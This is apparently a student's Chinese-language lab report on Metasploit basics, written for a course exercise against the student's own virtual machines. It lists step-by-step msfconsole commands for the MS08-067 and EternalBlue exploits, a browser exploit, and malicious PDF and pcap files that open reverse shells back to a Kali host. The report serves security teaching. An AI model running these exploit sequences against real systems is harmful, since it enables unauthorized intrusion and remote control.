Exp5 MSF基础应用 20165110

Exp5 MSF基础应用 20165110

一、实践要求(3.5分)

实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.一个主动攻击实践;(1分)

ms08_067_netapi:自动化漏洞溢出攻击

payload:generic/shell_reverse_tcp(成功)

payload:windows/vncinject/reverse_tcp (失败)

ms17_010_eternalblue:“永恒之蓝”自动化攻击

payload:windows/x64/shell/bind_tcp(成功)

payload:generic/shell_reverse_tcp(失败)

2.一个针对浏览器的攻击;(1分)

ms14_064_ole_code_execution

payload:windows/vncinject/reverse_tcp(成功且唯一)

payload:payload/generic/shell_reverse_tcp(成功)

payload:windows/x64/meterpreter/reverse_http(失败)

ms10_042_helpctr_xss_cmd_exec(失败)

3.一个针对客户端的攻击(1分)

Adobe(失败)

Wireshark:

payload:set payload windows/meterpreter/reverse_tcp        (成功)

4.成功应用任何一个辅助模块。(0.5分)

在实现ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口(成功)

在实现ms17_010中应用use auxiliary/scanner/smb/smb_ms17_010扫描存在该漏洞的靶机(成功且唯一)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

二、实验内容

Kali 的IP:10.1.1.211

首先是血与泪的教训(整了我足足三天)

!!注意:一定要在做实验之前把虚拟机的网卡设置为桥接模式,再通过设置虚拟网络编辑器,选择物理网卡,使得多台虚拟机处于同意网段中,否则之间根本就ping不通,攻击也无从谈起。

实验一:ms08_067_netapi

靶机:Microsoft Windows 2000(10.1.1.107)
1.首先使用kali进行漏洞扫描
nmap -sS -A --script=smb-vuln-ms08-067 -PO 10.1.1.211

vuln: 负责检查目标机是否有常见的漏洞(Vulnerability)
–script=: 使用某个或某类脚本进行扫描,支持通配符描述 

首先必须要说的是nmap能扫描的漏洞并不多,有时扫描一些漏洞会出现如下所示的情况,表示该漏洞没有在nmap扫描库中不可以被扫描。

但是此处的ms08_067非常凑巧的可以被扫描,扫描结果如下图

在kali端进入msfconsole控制台

首先查找ms08_067漏洞的具体位置
search ms08_067

然后进行漏洞选择
use exploit/windows/smb/ms08_067_netapi

通过show options
查看配置信息
使用辅助模块查看默认端口(445)是否开放

search portscan # 搜索端口
use auxiliary/scanner/portscan/tcp # 使用漏洞
show options  #显示设置
set RHOSTS 10.1.1.211  # 设置监听者地址
exploit # 攻击

返回ms08_967设置靶机类型
set target 1

查看可用的payloads

show payloads

set payload windows/x64/shell/bind_tcp//选择payload

再次查看相关配置信息

set LHOST 10.1.1.211
set LPORT 5111//注:此处因为我的学号5110始终被占用无法使用,故将端口更换成5111
exploit

攻击成功!!!

更换另一个payload:windows/vncinject/reverse_tcp
查找了一些关于这个payload的相关资料
Windows/vncinject/bind_tcp 在目标计算机上安装VNC并等待连接
期间它总是报出这样的错误

我针对这个错误做了这样的尝试:

就是不停地更换端口,后来也请教了一些大佬,说是因为上次的使用没有正常退出导致源端口被占用,无法继续执行下面的任务,

还有一种解决方案是关掉终端重新启动msfconsole,两种方法经过实践是都可以解决这个问题的

但是就我个人而言,我认为这个错误很奇怪啊,我每次在使用完成之后都会进行退出啊,为啥只要一退出再进入都会出现这样的端口占用问题呢,可能是我退出的方式不对吧。。。

好了言归正传回来,继续使用这个payload,设置好参数,然后exploit,

然后嗯等了好久好久,然后出现了一大堆false,我研究了半天也没搞明白这些false是什么原因,然后我又跑去换了sp2,xp,2007的靶机都以失败告终,这个payload攻击宣告失败。。。

实验二:ms17_010_eternalblue:“永恒之蓝”自动化攻击

在这个攻击该漏洞之前我利用了辅助工具auxiliary/scanner/smb/smb_ms17_010 这个扫描插件进行测试,该插件的作用是扫描本网段钟可能含有ms17-010漏洞的服务器,帮助我们寻找靶机

首先进入这个辅助工具的界面中
use auxiliary/scanner/smb/smb_ms17_010

随后通过指令show options

来查找该工具所需要的参数,我们可以看到RHOSTS和RPORT两个参数是必需的。

RPORT:在上一个漏洞中我们已经扫描了445端口是开放的,所以这里的RPORT不再修改直接使用即可。

RHOSTS:通过查找我们宿舍的网段网关地址为10.1.1.1,子网掩码是255.255.255.0,故目标网段应该填写为10.1.1.1/24将一些必备的参数填写进去,最后输入run或者exploit执行辅助工具。

经过一段时间的等待,我们可以发现扫描结果,本网段中有一台符合条件的主机,嘿嘿嘿,就是我的win7虚拟机啦,然后就可以愉快地开始攻击了呢。

首先老规矩输入下列一大串指令

search ms17_010 #搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue    #使用漏洞
show payloads   #显示可用攻击载荷
set payload payload/generic/shell_reverse_tcp  #选择攻击载荷
show options #查看配置信息
set LHOST 10.1.1.211 #设置监听地址
set RHOSTS 10.1.1.1/24(这里也可以写具体的主机地址) #设置靶机地址
exploit #开始攻击

注:由于我在做这个实验的时候崩了好几次虚拟机,所以我又重新拷了好几次虚拟机,所以实验中的RHOSTS在不停发生变化。。。

嘻嘻,攻击成功!!!

然后非常有冒险探索精神的我决定回一个payload``````payload:generic/shell_reverse_tcp`````
喵喵喵,失败了???

失败原因是好多好多个false,一开始是疑心我的参数设置的有问题,但是重新做了好几遍都不成功,我再折回去看靶机,一看哟蓝屏了,已经ping不通了,这个靶机成功又被我整die了,微笑.jpg。
我又参考了某猪的博客唔,觉得这个漏洞还是非常容易被攻击的,只要是相应的payloads基本都是可以成功的,至于去哪里找相应的paylos,有一个指令叫做info该指令可以朝朝到该漏洞的相关信息,有的describe里面会包含对应的payloads。

实验三:ms14_064_ole_code_execution(针对浏览器的攻击)


还是老规矩上代码:

search ms14_064//查找漏洞所在位置
use exploit/windows/browser/ms14_064_ole_code_execution//选择攻击模块
show payloads //显示可用攻击载荷
set payload windows/vncinject/reverse_tcp //在目标计算机上安装VNC并设置tcp反向连接
info //查看详细信息(发现可攻击winXP和win7)
set SRVHOST 10.1.1.211 //设置攻方IP
set LHOST 10.1.1.211
set LPORT 5111
set target 0 //设置winXP靶机
exploit //发起渗透攻击

生成一个URL地址,用WinXP的IE8.0打开,可以发现成功建立会话,

并且还会弹出VNC弹框,弹框中的内容是靶机的屏幕,实现了监控,

wow it‘s very cool。

我还尝试了一个常规payload:payload/generic/reverse_tcp

嘻嘻,同样也成功了。

我继续进行探索,payload:windows/x64/meterpreter/shell_reverse_https等诸多https的payload

很不幸,它们都失败了,所以我做出了大胆的假设,可能是因为我的两台机器之间并没有建立https通信方式。。。

附录:ms10_042_helpctr_xss_cmd_exec(对浏览器的攻击,失败)




实验四:对一个客户端进行攻击

Adobe

这个可真是难为我小猪佩奇了,我通过search adobe搜索了相关的漏洞最后选择了攻击成功率最高的攻击模块
windows/fileformat/adobe_cooltype_sing

靶机:WinXP

老规矩上代码

set payload
windows/meterpreter/reverse_tcp //设置tcp反向连接
set LHOST 10.1.1.211 //kali IP
set LPORT 5111 //设置攻击端口
set FILENAME 5110.pdf //设置生成的pdf文件名
exploit //发起攻击

成功在目录root/.msf4/local中生成5110.pdf,将该文件直接拖至靶机中

返回kali端进入监听模块:

use exploit/multi/handler //进入监听模块
exploit //监听

回到WinXP中双击打开pdf文件,然后不幸的事情发生了,

Adobe Reader开启失败,报错了,然后我尝试进行修复,然后依然没有办法打开pdf文件

我一开始怀疑是我生成的pdf文件有问题,导致Adobe Reader崩了,然后我在自己的主机上打开这个pdf,唔发现打开正常啊,里面的内容Hello World!说明pdf没问题啊,唔,那么悲惨的事实摆在了我的面前,那就是我的Adobe崩了。。。于是乎,我又跑去下载了其他的Adobe

然后嗯到现在也没有下载下来,等下载下来了我再进行尝试,
我还会再回来的==

Wireshark

这个也是为难我小猪佩奇的一个利器啊,不过这也只能怪我画蛇添足,自做聪明了。。。

靶机:WinXP

话不多说,上代码

 use exploit/windows/fileformat/wireshark_packet_dect.rb  //使用漏洞
 set payload windows/meterpreter/reverse_tcp //选择载荷
 set LHOST 10.1.1.211 //攻击者地址
 exploit

生成一个passwords.pcap捕包文件,将该文件拖至靶机中

进入监听模块

use exploit/multi/handler #进入监听模块
exploit #攻击

在靶机中打开passwords.pcap文件

攻击成功

中间出现了一个错误,就是我以为靶机中没有wireshark,我自己从网上下载了一个wireshark,这个wireshark是32位的版本比较老,所以使用它打开生成passwors.pacp文件显示的是错误,我在网上查找了出现这个错误的原因,因为Wireshark的版本中支持的数据量很小,生成的该pacp文件中的数据量已经超过了Wireshark一次所能读取的量,所以无法打开,我重装了虚拟机之后,使用其自带的wireshark即可成功实现该攻击。

三、实验中的遇到的问题

1.首先是我的kali与其他虚拟机不在一个网段上,根本无法进行ping通,直接导致了之前我所有的攻击都失败了。。。

2.攻击ms08-067时,我一开始使用的WinXP,但是一直都没有攻击成功,后来我通过参考某猪的博客,原来我的WinXP系统是中文版,里面已经装了相关的漏洞,所以当然攻击不成功了,微笑.jpg。

3.进行攻击时经常出现如下的状况
基本上换一下端口就可以解决,所以我实验中的截图的端口号从5109-5113都试过了。。。实在不行的话,那就重启msf吧

4.进行Wireshark攻击时,出现了一个错误,就是我以为靶机中没有wireshark,我自己从网上下载了一个wireshark,这个wireshark是32位的版本比较老,所以使用它打开生成passwors.pacp文件显示的是错误,我在网上查找了出现这个错误的原因,因为Wireshark的版本中支持的数据量很小,生成的该pacp文件中的数据量已经超过了Wireshark一次所能读取的量,所以无法打开,我重装了虚拟机之后,使用其自带的wireshark即可成功实现该攻击。

5.实验过程中还出现这样的问题

解决方案:加上set payload...

四、基础问题回答

1.用自己的话解释什么是exploit,payload,encode.

答:

exploit:应该是攻击模块,里面包含攻击的平台、攻击使用的工具、以及攻击所需要的参数,应该是一个集所有工具于一体的攻击模块。

payload:实际用于攻击的代码、机器指令

encode:对payload进行编码的编码器

2.实践总结与体会

答:这个我从上周二基本就开始做了,一直做到今天还有一些地方需要完善,整个电脑的风扇一直在响,最多的一次我一下子开了四台虚拟机,我看着我的CPU爆红,这是我有电脑以来,第一次出现这种情况,总结一句话,这个实验给我的感觉是道路是曲折的,前途是光明的,失败了九十九次,不要气馁,因为第一百次还会失败的,smile。
这个实验还是给了我一些经验,比如说排除问题,查找问题的能力,以及愈挫愈勇的能力。。。。

3.离实战还缺些什么技术或步骤?

答:我一直都好好奇,为啥每次实验都有这个问题。。。但是我还是要认真回答以下这个问题,我觉得我们离实战最缺少的步骤就是实践,所有的技术或者步骤都是具体问题具体分析,正如卖油翁中的一句话“唯手熟尔”。

posted on 2019-04-18 19:06  小orangegood  阅读(228)  评论(0编辑  收藏  举报

导航